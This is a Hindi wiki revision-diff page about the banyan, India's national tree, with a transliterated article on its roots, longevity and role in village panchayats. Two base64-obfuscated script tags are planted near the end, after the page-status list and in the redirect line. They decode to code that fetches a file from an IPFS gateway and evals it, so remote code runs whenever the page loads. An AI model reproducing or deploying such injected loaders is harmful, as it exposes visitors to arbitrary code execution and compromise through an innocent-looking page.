Difference between revisions of "बरगद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " भारत " to " भारत ")
Line 7: Line 7:
 
[[चित्र:Banyan-Tree-Kolkata.jpg|बरगद का पेड़, कोलकाता <br />Banyan Tree, Kolkata|thumb|left|250px]]
 
[[चित्र:Banyan-Tree-Kolkata.jpg|बरगद का पेड़, कोलकाता <br />Banyan Tree, Kolkata|thumb|left|250px]]
 
*जड़ों और अधिक तने से शाखाएं बनती हैं और इस विशेषता और लंबे जीवन के कारण इस वृक्ष को अनश्‍वर माना जाता है।  
 
*जड़ों और अधिक तने से शाखाएं बनती हैं और इस विशेषता और लंबे जीवन के कारण इस वृक्ष को अनश्‍वर माना जाता है।  
*बरगद का वृक्ष भारत के इतिहास और लोक कथाओं का एक अविभाज्‍य अंग है।
+
*बरगद का वृक्ष [[भारत]] के इतिहास और लोक कथाओं का एक अविभाज्‍य अंग है।
 
*अब भी बरगद के वृक्ष को ग्रामीण जीवन का केंद्र बिन्‍दु माना जाता है और आज भी गांव की परिषद इसी पेड़ की छाया में पंचायत करती है।
 
*अब भी बरगद के वृक्ष को ग्रामीण जीवन का केंद्र बिन्‍दु माना जाता है और आज भी गांव की परिषद इसी पेड़ की छाया में पंचायत करती है।
  

Revision as of 09:38, 20 September 2010

thumb|250px|baragad ke vriksh
Banyan Tree
baragad / rashh‍triy vriksh

  • bharat ka rashh‍triy vriksh baragad (phaikas beanghaleansis) hai. baragad ka vriksh ghana evan phaila hua hota hai.
  • isaki shakhaean door-door tak phaili tatha j dean gahari hoti haian. itani gahari j dean kisi aur vriksh ki nahian hotian.
  • baragad ke vriksh ki shakhaean aur j dean ek b de hish‍se mean ek ne pe d ke saman lagane lagati haian.

baragad ka pe d, kolakata
Banyan Tree, Kolkata|thumb|left|250px

  • j doan aur adhik tane se shakhaean banati haian aur is visheshata aur lanbe jivan ke karan is vriksh ko anashh‍var mana jata hai.
  • baragad ka vriksh bharat ke itihas aur lok kathaoan ka ek avibhajh‍y aang hai.
  • ab bhi baragad ke vriksh ko gramin jivan ka keandr binh‍du mana jata hai aur aj bhi gaanv ki parishad isi pe d ki chhaya mean panchayat karati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

_

sanbandhit lekh

  1. REDIRECT saancha:rashtriy chihn aur pratik<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>